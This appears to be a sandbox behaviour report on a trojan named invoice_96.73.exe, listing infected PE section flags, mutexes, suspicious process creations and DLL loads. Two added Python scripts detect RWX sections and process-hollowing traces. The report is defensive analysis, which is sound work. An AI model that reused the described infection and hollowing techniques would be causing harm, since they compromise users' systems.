      Source: AutoIt3_x64.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: RdrServicesUpdater.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: AcroRd32.exe.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: OSE.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: DW20.EXE.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
      Source: wbengine.exe.2.drBinary string: YK _hImpersonationToken != INVALID_HANDLE_VALUEd:\w7rtm\base\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecoverypBpb\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\readBuffer != NULL{{3808876B-C176-4e48-B7AE-04046E6CC752}!IsListEmpty(&diffsInSource)\pagefile.sys\hiberfil.sysBackupFileNameUniqueIdWin32ErrorCodeIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSize\\?\GLOBALROOT\Device\BlbControlImpersonationToken != INVALID_HANDLE_VALUEoutputBuf->MultiSzLength % sizeof (WCHAR) == 0.\%ws_compressionReadAheadBufferOverlapped.hEventd:\w7rtm\base\stor\blb\blbimg\backfile.cxx_handle != NULL_isCompactForm == FALSE_handle == NULLblockNumberOnDisk != 0xFFFFFFFFdiskOffset >= volumeStartOffsetvolumeBlockOffsetBitLength >= bitsInvolumeStartOffset_batRelativeVolumePointer >= BLBIMGF_SECTOR_SIZE!_isCompactForm_batList[diskBlockOffset] != 0xFFFFFFFFdiskBlockOffset < _numberOfBatEntriesoffsetInDiskBlock % BLBIMGI_BYTES_PER_BLOCK == 0prevBlock >= 0(length == BLBIMGI_BYTES_PER_BLOCK) || isLastBlockInSource_currentFilePointer < _maximumFileSize!_isReadInitialized_currentFileSize >= _existingFileSizebitsInvolumeStartOffset < BLBIMGI_BITS_PER_BAT_BLOCKbisMasterBootRecord_currentFilePointer <= _maximumFileSize_newVhdFormatconectixvsimcxsparsewriteOffSet - Length + _lastBlockSize == _volumeSizereadOffset.QuadPart%BLBIMGF_SECTOR_SIZE == 0readOffset.QuadPart/BLBIMGF_SECTOR_SIZE >= _firstBlockSectorreadOffset.QuadPart/BLBIMGF_SECTOR_SIZE <= _maximumFileSizelen == _sectorSized:\w7rtm\base\stor\blb\blbimg\snapvol.cxx_currentBitNumber == 0_currentBlockListNumber < _batBlockListLength_batBlockList[_currentBlockListNumber] != 
0xFFFFFFFFbytesRead == lensplitReadulReadSize > 0_blockBitmap.SizeOfBitMap >= 1.
      Source: wbengine.exe.2.drBinary string: Element\Device\HarddiskVolume
      Source: wbengine.exe.2.drBinary string: >`WindowsBackupLinksLink_{47b7fa87-ce42-48ff-8b18-2f1088121503}Child_{47b7fa87-ce42-48ff-8b18-2f1088121503}\\?\Globalroot\Device\Harddisk%lu\Partition1\a
      Source: wbengine.exe.2.drBinary string: \Device\Harddisk%lu\Partition%lu
      Source: wbengine.exe.2.drBinary string: !m_bAsyncInProgressd:\w7rtm\base\stor\blb\engine\service\engine.cpp!m_pAsyncRefg_cInitialized == 0SeBackupPrivilegeSeRestorePrivilegefveapi.dllm_pAsyncRef == NULL && m_eOperationType == BLB_OT_UNDEFINEDcVolume < cMaxVolumecTarget < cMaxTargetm_pAsyncHelper == NULL && m_pAsyncRef == NULL*ppAsync != NULLm_bIsRecoveryStartedBlbMountedVolumesBlbMountedVolumeFile%d\\?\GLOBALROOT\Device\HarddiskVolumeFile%dm_numNetworkShareVolumes > 0NOT currOffset < bufSizeOutm_pAsyncHelper!m_pAsyncHelperShowWarningwszFileSpecsXMLpTemplatepbAllCriticalpbSystemStatepTargetpMedia->m_eMediaType == BLB_MT_SHINY || pMedia->m_eMediaType == BLB_MT_REMOVABLEpCatBackupSet->m_cTarget == 1Software\Policies\Microsoft\Windows\Backup\ClientSoftware\Policies\Microsoft\Windows\Backup\ServerDisableBackupToNetworkNoBackupToNetworkDisableBackupToDiskNoBackupToDiskDisableBackupToOpticalNoBackupToOpticalNoRunNowBackupOnlySystemBackupDisableSystemBackupUIRestoreTimeSoftware\Microsoft\Windows NT\CurrentVersion\SystemRestoreRestoreStatusResultguidBackupSetId != GUID_NULLcMedia > 0rgCatBackupSet[i].m_wszCurrentTargetNamem_pCatalogSystempTemplate->m_bIsScheduledTemplatepOldTemplate != NULLpNewTemplate != NULLpbstTypergBackupVolumesrgAllVolumesInfocBackupVolumecVolumeInfotk
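The DW20.EXE entry above shows a .reloc section carrying IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE on top of the data/discardable/read flags a linker normally emits, which is what an appended-code file infector leaves behind. The following is an added example, not code from the report or the sandbox vendor: a dependency-free PE header walker that flags RWX sections, a .reloc section whose characteristics differ from the normal set, and an entry point that lands in a section not marked as code. The sample PE it builds is constructed in-memory (headers only, no real code) so the check runs offline; the characteristics constants are the winnt.h values.

```python
import struct
import sys

# Section characteristics from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Flags a linker normally gives .reloc: initialized data, discardable, read-only.
NORMAL_RELOC = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ
# Flags the report shows on DW20.EXE's .reloc: executable and writable on top of the normal set.
INFECTED_RELOC = NORMAL_RELOC | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE


def parse_pe(data):
    """Return (entry_point_rva, sections); each section is
    (name, virtual_address, virtual_size, raw_size, characteristics)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    # AddressOfEntryPoint sits at offset 16 of both the PE32 and the PE32+ optional header
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        h = struct.unpack_from("<8sIIIIIIHHI", data, opt + size_opt + 40 * i)
        name = h[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, h[2], h[1], h[3], h[9]))
    return entry, sections


def section_findings(data):
    """Heuristics for a file-infector style modification: RWX sections, a .reloc that is
    no longer plain data, and an entry point inside a section not marked as code."""
    entry, sections = parse_pe(data)
    findings = []
    for name, vaddr, vsize, rsize, chars in sections:
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append(f"{name}: section is writable and executable (RWX)")
        if name == ".reloc" and chars != NORMAL_RELOC:
            findings.append(f".reloc: unusual characteristics 0x{chars:08X}")
        if vaddr <= entry < vaddr + max(vsize, rsize) and not chars & IMAGE_SCN_CNT_CODE:
            findings.append(f"entry point 0x{entry:X} lies in {name}, which is not marked as code")
    return findings


def build_sample_pe(reloc_chars, entry_rva):
    """Constructed minimal PE32 header (no real code) with a .text and a .reloc section."""
    secs = [(b".text", 0x1000, 0x1000, 0x200, 0x400,
             IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
            (b".reloc", 0x1000, 0x2000, 0x200, 0x600, reloc_chars)]
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    size_opt = 224  # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, size_opt, 0x0102)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)   # AddressOfEntryPoint
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in secs)
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


if __name__ == "__main__":
    # Usage: python pe_section_check.py <file.exe> [...]
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            for finding in section_findings(f.read()):
                print(f"{path}: {finding}")
```

Pointing this at the executables the report lists as dropped (armsvc.exe, wbengine.exe, alg.exe and the rest) is a quick way to separate files that were rewritten from files that merely ran. A packer can also produce RWX or oddly-flagged sections, so treat a hit as a lead for hash comparison against a known-good copy rather than as proof of infection.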
      Source: classification engine | Classification label: mal100.spre.troj.evad.winEXE@18/88@39/10
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\logECFE.tmp
      Source: C:\Users\user\Desktop\invoice_96.73.exe | File created: C:\Users\user\AppData\Roaming\23f9eaead4df6ab2.bin
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab29ea72c54-b
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab2-inf
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-23f9eaead4df6ab2ab63edc8-b
      Source: C:\Users\user\Desktop\invoice_96.73.exe | File created: C:\Users\user\AppData\Local\Temp\autABDA.tmp
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: invoice_96.73.exe | ReversingLabs: Detection: 95%
      Source: unknown | Process created: C:\Users\user\Desktop\invoice_96.73.exe "C:\Users\user\Desktop\invoice_96.73.exe"
      Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"
      Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
      Source: unknown | Process created: C:\Windows\ehome\ehrecvr.exe C:\Windows\ehome\ehRecvr.exe
      Source: unknown | Process created: C:\Windows\ehome\ehsched.exe C:\Windows\ehome\ehsched.exe
      Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
      Source: unknown | Process created: C:\Windows\System32\ieetwcollector.exe C:\Windows\system32\IEEtwCollector.exe /V
      Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
      Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
      Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
      Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
      Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
      Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
      Source: unknown | Process created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"
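One row above stands out: the sample starts C:\Windows\SysWOW64\svchost.exe but hands it its own command line ("C:\Users\user\Desktop\invoice_96.73.exe"). An image path that disagrees with the executable named on the command line is the trace that process hollowing leaves in process-creation telemetry, and it pairs with the "Creates a process in suspended mode" and "Writes to foreign memory regions" signatures in the summary. The script below is an added example, not part of the report, that applies that check plus a second one (a Windows binary whose parent runs from a user-writable path) to process-creation events; the event tuples are constructed from the rows above, and the user-writable path markers are the author's assumption about what is worth alerting on.

```python
import ntpath

# Path fragments an unprivileged user can write to (assumed list; extend for your estate).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Constructed from the "Process created" rows of the report:
# (parent image, child image, child command line)
SAMPLE_EVENTS = [
    ("unknown", r"C:\Users\user\Desktop\invoice_96.73.exe",
     r'"C:\Users\user\Desktop\invoice_96.73.exe"'),
    ("unknown", r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe",
     r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"'),
    (r"C:\Users\user\Desktop\invoice_96.73.exe", r"C:\Windows\SysWOW64\svchost.exe",
     r'"C:\Users\user\Desktop\invoice_96.73.exe"'),
    ("unknown", r"C:\Windows\System32\alg.exe", r"C:\Windows\System32\alg.exe"),
    ("unknown", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
]


def first_token(cmdline):
    """Executable named by a Windows command line: the quoted first argument,
    or the text up to the first space when it is unquoted."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def triage(events):
    """Return one alert string per suspicious process-creation event."""
    alerts = []
    for parent, image, cmdline in events:
        claimed = first_token(cmdline)
        # Hollowing: CreateProcess on a system binary with the dropper's own command line
        if ntpath.basename(claimed).lower() != ntpath.basename(image).lower():
            alerts.append(f"{image}: command line names {claimed} "
                          "(image/command-line mismatch, consistent with process hollowing)")
        # A Windows binary launched by something living under a user-writable directory
        if (any(m in parent.lower() for m in USER_WRITABLE)
                and image.lower().startswith("c:\\windows\\")):
            alerts.append(f"{image}: Windows binary started by {parent} from a user-writable path")
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Only the svchost.exe row trips both checks; the service binaries with an "unknown" parent pass, which is the expected result for processes the Service Control Manager started outside the sandbox's tracing. On a real endpoint the same two comparisons map directly onto Sysmon Event ID 1 fields (ParentImage, Image, CommandLine).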
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: wow64win.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: wow64cpu.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: wsock32.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: winmm.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: mpr.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: webio.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: secur32.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: credssp.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: wow64win.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: wow64cpu.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: winhttp.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: webio.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: mpr.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: secur32.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: ntmarta.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: iphlpapi.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: winnsi.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: cryptsp.dll
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Section loaded: credssp.dll
      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wow64cpu.dll
      Source: C:\Windows\System32\alg.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\alg.exe | Section loaded: wsock32.dll
      Source: C:\Windows\System32\alg.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\alg.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\alg.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mswsock.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: webengine4.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: winhttp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: webio.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: mpr.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: secur32.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: version.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ehtrace.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: slc.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: winhttp.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: webio.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: mpr.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: secur32.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ehetw.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: winmm.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: msdmo.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: winnsi.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: wevtapi.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\ehome\ehrecvr.exe | Section loaded: ssdpapi.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: slc.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: winhttp.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: webio.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: mpr.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: secur32.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: ehetw.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\ehome\ehsched.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: pcwum.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: version.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: tapi32.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: credui.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: fxstiff.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\FXSSVC.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\ieetwcollector.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\ieetwcollector.exe | Section loaded: rpcrtremote.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: wow64win.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: wow64cpu.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: version.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: winhttp.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: webio.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: mpr.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: secur32.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: dnsapi.dll
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtctm.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcprx.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxclu.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: clusapi.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: cryptdll.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: resutils.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: version.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: ktmw32.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtclog.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: winmm.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: xolehlp.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: comres.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: msdtcvsp1res.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: mtxoci.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: oci.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: credssp.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\msdtc.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: dwmapi.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\msiexec.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: wow64win.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: wow64cpu.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: winhttp.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: webio.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\perfhost.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\snmptrap.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: osuninst.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: vdsutil.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: netapi32.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: ulib.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: ifsutil.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\vds.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: vssapi.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: vsstrace.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: netapi32.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: wkscli.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: xmllite.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: virtdisk.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: fltlib.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: clusapi.dll
      Source: C:\Windows\System32\wbengine.exe | Section loaded: cryptdll.dll
